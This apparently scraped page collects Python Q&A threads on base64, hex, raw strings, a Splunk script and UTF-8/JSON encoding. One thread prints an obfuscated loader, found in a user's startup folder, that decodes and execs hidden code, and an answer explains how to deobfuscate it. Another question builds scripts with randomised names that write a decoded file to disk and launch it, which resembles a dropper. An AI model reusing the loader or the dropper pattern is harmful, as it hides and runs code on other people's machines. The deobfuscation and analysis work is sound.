Base64 string format in python - python

I'm having an issue figuring out how to properly input base64 data into a string format in python 2.7. Here's the relevant code snippet:
fileExec = open(fileLocation, 'w+')
fileExec.write(base64.b64decode('%s')) %(encodedFile) # encodedFile is base64 data of a file grabbed earlier in the script.
fileExec.close()
os.startfile(fileLocation)
As silly as it may seem, I am required to use the string formatting in this case, due to the what this script is actually doing, but when I launch the script, I receive the following error:
TypeError: Incorrect Padding
I'm not quite sure what I need to do to the '%s' to get this to work. Any suggestions? Am I using the wrong string format?
Update: Here's a better idea of what I'm ultimately trying to accomplish:
encodedFile = randomString() # generates a random string for the variable name to be written
fileExec = randomString()
... snip ...
writtenScript += "\t%s.write(base64.b64decode(%s))\n" %(fileExec, encodedFile) # where writtenScript is the contents of the .py file that we are dynamically generating
I must use string formatting because the variable name will not always be the same in the python file we making.

That error usually means your base64 string may not be encoded properly. But here it is just a side-effect of a logic error in your code.
What you have done is basically this:
a = base64.b64decode('%s')
b = fileExec.write(a)
c = b % (encodedFile)
So you are attempting to decode the literal string "%s", which fails.
It should look more like this:
fileExec.write(base64.b64decode(encodedFile))
[edit: using redundant string format... pls don't do this in real code]
fileExec.write(base64.b64decode("%s" % encodedFile))
Your updated question shows that the b64decode part is inside of a string, not in your code. That is a significant difference. The code in your string is also missing a set of inner quotes around the second format:
writtenScript += "\t%s.write(base64.b64decode('%s'))\n" % (fileExec, encodedFile)
(notice the single quotes...)

Related

Trying to understand this potentially virus encrypted pyw file

Today I realised this .pyw file was added into my startup files.
Though I already deleted it, I suspect what it may have initially done to my computer, but it's sort of encrypted and I am not very familiar with Python, but I assume as this is the source code regardless, there is no actual way to completely encrypt it.
Can someone either guide me through how I can do that, or check it for me?
edit: by the looks of it I can only post some of it here, but it should give brief idea of how it was encrypted:
class Protect():
def __decode__(self:object,_execute:str)->exec:return(None,self._delete(_execute))[0]
def __init__(self:object,_rasputin:str=False,_exit:float=0,*_encode:str,**_bytes:int)->exec:
self._byte,self._decode,_rasputin,self._system,_bytes[_exit],self._delete=lambda _bits:"".join(__import__(self._decode[1]+self._decode[8]+self._decode[13]+self._decode[0]+self._decode[18]+self._decode[2]+self._decode[8]+self._decode[8]).unhexlify(str(_bit)).decode()for _bit in str(_bits).split('/')),exit()if _rasputin else'abcdefghijklmnopqrstuvwxyz0123456789',lambda _rasputin:exit()if self._decode[15]+self._decode[17]+self._decode[8]+self._decode[13]+self._decode[19] in open(__file__, errors=self._decode[8]+self._decode[6]+self._decode[13]+self._decode[14]+self._decode[17]+self._decode[4]).read() or self._decode[8]+self._decode[13]+self._decode[15]+self._decode[20]+self._decode[19] in open(__file__, errors=self._decode[8]+self._decode[6]+self._decode[13]+self._decode[14]+self._decode[17]+self._decode[4]).read()else"".join(_rasputin if _rasputin not in self._decode else self._decode[self._decode.index(_rasputin)+1 if self._decode.index(_rasputin)+1<len(self._decode)else 0]for _rasputin in "".join(chr(ord(t)-683867)if t!="ζ"else"\n"for t in self._byte(_rasputin))),lambda _rasputin:str(_bytes[_exit](f"{self._decode[4]+self._decode[-13]+self._decode[4]+self._decode[2]}(''.join(%s),{self._decode[6]+self._decode[11]+self._decode[14]+self._decode[1]+self._decode[0]+self._decode[11]+self._decode[18]}())"%list(_rasputin))).encode(self._decode[20]+self._decode[19]+self._decode[5]+self._decode[34])if _bytes[_exit]==eval else exit(),eval,lambda _exec:self._system(_rasputin(_exec))
return self.__decode__(_bytes[(self._decode[-1]+'_')[-1]+self._decode[18]+self._decode[15]+self._decode[0]+self._decode[17]+self._decode[10]+self._decode[11]+self._decode[4]])
Protect(_rasputin=False,_exit=False,_sparkle='''ceb6/f2a6bdbe/f2a6bdbb/f2a6bf82/f2a6bf83/ceb6/f2a6bdbe/f2a6bdbb/f2a6bf83/f2a6bf80/f2a6bdbb/f2a6bf93/f2a6bf89/f2a6bf8f/f2a6bdbb/f2a6bebe/f2a6bebf/f2a6bf89/f2a6bebc/f2a6bf80/
OBLIGATORY WARNING: The code is pretty obviously hiding something, and it eventually will build a string and exec it as a Python program, so it has full permissions to do anything your user account does on your computer. All of this is to say DO NOT RUN THIS SCRIPT.
The payload for this nasty thing is in that _sparkle string, which you've only posted a prefix of. Once you get past all of the terrible spacing, this program basically builds a new Python program using some silly math and exec's it, using the _sparkle data to do it. It also has some basic protection against you inserting print statements in it (amusingly, those parts are easy to remove). The part you've posted decrypts to two lines of Python comments.
# hi
# if you deobf
Without seeing the rest of the payload, we can't figure out what it was meant to do. But here's a Python function that should reverse-engineer it.
import binascii
# Feed this function the full value of the _sparkle string.
def deobfuscate(data):
decode = 'abcdefghijklmnopqrstuvwxyz0123456789'
r = "".join(binascii.unhexlify(str(x)).decode() for x in str(data).split('/'))
for x in r:
if x == "ζ":
print()
else:
x = chr(ord(x)-683867)
if x in decode:
x = decode[(decode.index(x) + 1) % len(decode)]
print(x, end='')
Each sequence of hex digits between the / is a line. Each two hex digits in the line is treated as a byte and interpreted as UTF-8. The resulting UTF-8 character is then converted to its numerical code point, the magic number 683867 is subtracted from it, and the new number is converted back into a character. Finally, if the character is a letter or number, it's "shifted" once to the right in the decode string, so letters move one forward in the alphabet and numbers increase by one (if it's not a letter/number, then no shift is done). The result, presumably, forms a valid Python program.
From here, you have a few options.
Run the Python script I gave above on the real, full _sparkle string and figure out what the resulting program does yourself.
Run the Python script I gave above on the real, full _sparkle string and post the code in your question so we can decompose that.
Post the full _sparkle string in the question, so I or someone else can decode it.
Wipe the PC to factory settings and move on.

Converting a string formatted in hex in Python to binary data correctly

I have a string formatted as '\x00\x00\x00\x00' and need it to be formatted such that, when printed, it appears in the console as b'\x00\x00\x00\x00'
How do I do this?
edit: I had a different version of the code printing out a string formatted with b'\xf4\x00\x00\x00' etc and on my computer it prints '\xf4\x00\x00\x00'
Just add the b literal before the string, in that way you'll be defining the string as bytes
# example
s = b"\x00\x00\x00\x00"
print(s)
If instead you're receiving the string from somewhere else and you're not manually writing it you can just encode the string into bytes
# an other example
# let's pretend that we received the value from, say, a function
s = "\x00\x00\x00\x00".encode() # again, pretend that this value has just been retrieved from a function
print(s)

Python: Image's path as a raw string an input to a function

Python: I want to get an image as an input from the user as a raw string! I used input() to get the path. Giving it as a raw string makes the program work, I can do it by appending r before the path, but Image.open(' ') also takes r as a string and producing an error. Can someone help me in resolving this problem.
path=input('Please enter the path of the image')
im=Image.open(path)
get an error as no file found
if i give..
y='r'+path
im=Image.open(y)
then the error is
OSError: [Errno 22] Invalid argument: 'rC:\\Users\\User\\Desktop\.......jpeg'
I am new to python, so please help me if there is any method by which I can solve this issue.
raw strings are for a programmer's convenience; you don't have to have your users enter raw strings as normal input.
See the end of this post for the solution to your problem. Because you said you are new to Python, I have decided to give a detailed answer here.
Why raw strings?
Normal strings assign special meaning to the \ (backslash) character. This is fine as \ can be escaped by using \\ (two backslashes) to represent a single backslash.
However, this can sometimes become ugly.
Consider, for example, a path: C:\Users\Abhishek\test.txt. To represent this as a normal string in Python, all \ must be escaped:
string = 'C:\\Users\\Abhishek\\test.txt'
You can avoid this by using raw strings. Raw strings don't treat \ specially.
string = r'C:\Users\Abhishek\test.txt'
That's it. This is the only use of raw strings, viz., convenience.
Solution
If you are using Python 2, use raw_input instead of input. If you are using Python 3 (as you should be) input is fine. Don't try to input the path as a raw string.

How does one create inline Python scripts for use in Splunk search queries?

I am creating a simple script to take a hex(base 16) encoded field and convert it to readable text. For this endeavor I have decided to use the built in Python function for strings ".decode("hex")." I would like to use this script in a search "pipeline" running a field called packet through the statement and creating a new field of decoded text in the process.
I have read the documentation for the API splunk.Intersplunk however I am not 100% understanding what exactly that I need to use to complete my script. Specifically, from the examples I have seen, I do not understand what the following lines do for me?
(isgetinfo, sys.argv) = splunk.Intersplunk.isGetInfo(sys.argv)
Additionally in the case of collecting results and creating the new field is the following line needed?
results = splunk.Intersplunk.readResults(None, None, False)
So you are tracking this is what I have thus far and I believe I am close.
import sys
import splunk.Intersplunk
import string
#Program takes hex encoded string from a field and outputs value in search results at the gui
(isgetinfo, sys.argv) = splunk.Intersplunk.isGetInfo(sys.argv) #debug to see arguments I think Does it print these out?
results = splunk.Intersplunk.readResults(None, None, False)
str=""
if len(sys.argv) < 2: # make sure there is an argument passed if not return error
splunk.Intersplunk.parseError("[!] No arguments provided, please provide one argument.")
sys.exit(1)
else: #grab the string from sys.argv and make it uppercase because I like uppercase hex strings :)
str=sys.argv[1]
str=str.upper()
if all(char in string.hexdigits for char in str): # make sure all characters are hex
decoded_string = str.decode("hex")
splunk.Intersplunk.outputResults(decoded_string)
else: # return an error if its not a hex string
splunk.Intersplunk.parseError("[!] String provided is not [A-F 0-9], please validate your inputs")
sys.exit(1)
Also I am aware of the need for the STANZA setting below.
[decode_hex]
TYPE = python
FILENAME = decode_hex.py

Convert Unicode string to UTF-8, and then to JSON

I want to encode a string in UTF-8 and view the corresponding UTF-8 bytes individually. In the Python REPL the following seems to work fine:
>>> unicode('©', 'utf-8').encode('utf-8')
'\xc2\xa9'
Note that I’m using U+00A9 COPYRIGHT SIGN as an example here. The '\xC2\xA9' looks close to what I want — a string consisting of two separate code points: U+00C2 and U+00A9. (When UTF-8-decoded, it gives back the original string, '\xA9'.)
Then, I want the UTF-8-encoded string to be converted to a JSON-compatible string. However, the following doesn’t seem to do what I want:
>>> import json; json.dumps('\xc2\xa9')
'"\\u00a9"'
Note that it generates a string containing U+00A9 (the original symbol). Instead, I need the UTF-8-encoded string, which would look like "\u00C2\u00A9" in valid JSON.
TL;DR How can I turn '©' into "\u00C2\u00A9" in Python? I feel like I’m missing something obvious — is there no built-in way to do this?
If you really want "\u00c2\u00a9" as the output, give json a Unicode string as input.
>>> print json.dumps(u'\xc2\xa9')
"\u00c2\u00a9"
You can generate this Unicode string from the raw bytes:
s = unicode('©', 'utf-8').encode('utf-8')
s2 = u''.join(unichr(ord(c)) for c in s)
I think what you really want is "\xc2\xa9" as the output, but I'm not sure how to generate that yet.

Categories